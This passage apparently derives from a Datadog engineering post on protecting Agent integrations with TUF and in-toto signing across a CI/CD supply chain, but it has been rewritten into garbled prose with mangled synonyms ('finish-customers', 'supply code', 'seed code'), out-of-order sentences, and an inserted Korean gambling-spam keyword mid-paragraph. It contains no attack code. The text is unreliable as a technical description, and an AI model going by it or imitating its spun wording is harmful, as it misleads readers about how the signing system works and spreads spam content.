The Datadog Agent consists of integrations that acquire knowledge from doubtlessly lots of software packages. To the better of our information, we’re the first in the industry to discuss how to construct such a compromise-resilient CI/CD system: that is, we protect the authenticity and integrity of Agent integrations, from the moment that our builders commit source code, to the point that our finish-customers set up them as packages. A step could also be, for example, a developer writing source code or a CI/CD job packaging this source code into a zip file. The CI/CD system makes use of TUF to sign new integrations, and in-toto ensures that the CI/CD system packaged exactly the supply code that certainly one of our builders signed. A functionary is uniquely recognized by the public key that they’ll use to sign a bit of link metadata as proof that a step inside the provision chain was performed.
The important thing level is that this supply chain gives end-to-end verification: it ensures the Agent only trusts wheels containing seed code that was launched by Datadog developers. Every Yubikey requires a secret consumer PIN to unlock the signing key. This can be used to, e.g., confirm in opposition to the output of the docker build. Download the source, make a construct. We also want the ability to construct routinely. This couples the discharge of integrations with that of the Agent, which might delay the release of crucial characteristic enhancements and enhancements. Extra metadata, in addition to layout and link metadata, will be provided together with goal information to verify other properties of the supply chain (e.g., was a code assessment policy applied?) when inspecting the ultimate product.
When a shopper such as the Datadog Agent places the signed metadata collectively, it is ready to examine whether a package deal was produced following this prescribed collection of steps by only the designated events. With this in thought, we describe the next objectives for a defender. The CI/CD system must obtain the source code from the earlier step and beforehand constructed Python wheels. 먹튀검증 The CI/CD system should receive the identical wheels as the previous step. Lastly, the Datadog Agent will obtain and extract files from one of those wheels to ensure that they correspond to the same Python supply code and YAML configuration files that our developers signed. Publish new integrations independently of Agent releases. The challenge lies in ensuring finish-to-finish safety when utilizing automation to build, signal, and publish integrations.